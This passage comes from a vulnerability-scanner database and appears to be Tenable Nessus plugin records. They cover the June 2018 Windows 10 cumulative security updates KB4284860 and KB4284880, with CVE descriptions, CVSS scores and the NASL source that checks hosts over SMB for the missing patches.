exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8229)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8212, CVE-2018-8215,\n CVE-2018-8216, CVE-2018-8217, CVE-2018-8221)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)", "edition": 21, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "KB4284860: Windows 10 June 2018 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8225"], "modified": "2018-06-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_JUN_4284860.NASL", "href": "https://www.tenable.com/plugins/nessus/110489", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110489);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0978\",\n \"CVE-2018-1036\",\n \"CVE-2018-1040\",\n \"CVE-2018-8169\",\n \"CVE-2018-8201\",\n \"CVE-2018-8205\",\n \"CVE-2018-8207\",\n \"CVE-2018-8209\",\n \"CVE-2018-8210\",\n \"CVE-2018-8212\",\n \"CVE-2018-8213\",\n \"CVE-2018-8215\",\n \"CVE-2018-8216\",\n \"CVE-2018-8217\",\n \"CVE-2018-8221\",\n \"CVE-2018-8225\",\n \"CVE-2018-8226\",\n \"CVE-2018-8229\",\n \"CVE-2018-8231\",\n \"CVE-2018-8234\",\n \"CVE-2018-8235\",\n \"CVE-2018-8236\",\n \"CVE-2018-8251\",\n \"CVE-2018-8267\"\n );\n script_bugtraq_id(\n 104328,\n 104331,\n 104333,\n 104334,\n 104336,\n 104337,\n 104338,\n 104340,\n 104343,\n 104356,\n 104360,\n 104361,\n 104364,\n 104369,\n 104373,\n 104379,\n 104389,\n 104391,\n 104393,\n 104395,\n 104398,\n 104404,\n 104406,\n 104407\n );\n script_xref(name:\"MSKB\", value:\"4284860\");\n script_xref(name:\"MSFT\", value:\"MS18-4284860\");\n\n script_name(english:\"KB4284860: Windows 10 June 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4284860.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8229)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8212, CVE-2018-8215,\n CVE-2018-8216, CVE-2018-8217, CVE-2018-8221)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\");\n # https://support.microsoft.com/en-us/help/4284860/windows-10-update-kb4284860\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?686a6741\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4284860.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8231\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-06\";\nkbs = make_list('4284860');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"06_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4284860])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:14", "description": "The remote Windows host is missing security update 4284880.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8229)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8212, CVE-2018-8215,\n CVE-2018-8216, CVE-2018-8217, CVE-2018-8221)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)", "edition": 21, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "KB4284880: Windows 10 Version 1607 and Windows Server 2016 June 2018 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8214", "CVE-2018-8225"], "modified": "2018-06-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_JUN_4284880.NASL", "href": "https://www.tenable.com/plugins/nessus/110491", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110491);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0978\",\n \"CVE-2018-0982\",\n \"CVE-2018-1036\",\n \"CVE-2018-1040\",\n \"CVE-2018-8169\",\n \"CVE-2018-8201\",\n \"CVE-2018-8205\",\n \"CVE-2018-8207\",\n \"CVE-2018-8208\",\n \"CVE-2018-8209\",\n \"CVE-2018-8210\",\n \"CVE-2018-8212\",\n \"CVE-2018-8213\",\n \"CVE-2018-8214\",\n \"CVE-2018-8215\",\n \"CVE-2018-8216\",\n \"CVE-2018-8217\",\n \"CVE-2018-8219\",\n \"CVE-2018-8221\",\n \"CVE-2018-8225\",\n \"CVE-2018-8226\",\n \"CVE-2018-8229\",\n \"CVE-2018-8231\",\n \"CVE-2018-8234\",\n \"CVE-2018-8235\",\n \"CVE-2018-8236\",\n \"CVE-2018-8239\",\n \"CVE-2018-8251\",\n \"CVE-2018-8267\"\n );\n script_bugtraq_id(\n 104328,\n 104331,\n 104333,\n 104334,\n 104336,\n 104337,\n 104338,\n 104340,\n 104343,\n 104353,\n 104356,\n 104360,\n 104361,\n 104364,\n 104369,\n 104373,\n 104379,\n 104382,\n 104389,\n 104391,\n 104392,\n 104393,\n 104394,\n 104395,\n 104398,\n 104401,\n 104404,\n 104406,\n 104407\n );\n script_xref(name:\"MSKB\", value:\"4284880\");\n script_xref(name:\"MSFT\", value:\"MS18-4284880\");\n\n script_name(english:\"KB4284880: Windows 10 Version 1607 and Windows Server 2016 June 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4284880.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8229)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n 